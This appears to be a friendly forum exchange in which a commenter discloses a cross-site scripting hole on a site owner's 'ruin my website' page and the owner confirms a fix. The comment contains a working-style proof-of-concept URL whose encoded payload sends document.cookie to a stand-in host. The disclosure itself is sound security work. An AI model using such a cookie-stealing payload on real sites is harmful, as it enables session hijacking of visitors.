Yeah, I was thinking of someone injecting some JS code into a link, and getting you to click on it. If you have no dynamic content on the domain, then you should be safe. Also I can't imagine anyone would normally bother; I just genuinely found the title+exploit combination funny. POC: https://www.fuzzjunket.com/ruin-my-website/?October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27//example.com/%27%20%2B%20document.cookie;%22%20/%3E Html encoding the string before doing the replacement should fix it if you can be bothered. Pseudo-edit: Just saw you already pushed a fix. That was fast. The POC did work before the fix.
Oooh, thank you! I'm aware inviting the Internet to ruin my site is probably like poking a sleeping dragon, but I try to stay on top of any security risks and I'm always glad to get pointers. I figured any injection attacks couldn't affect anyone but the person viewing the website, but I hadn't considered anyone trying to hook me with their nefarious schemes. The cheek. "Infamy! Infamy! They've all got it in for me!"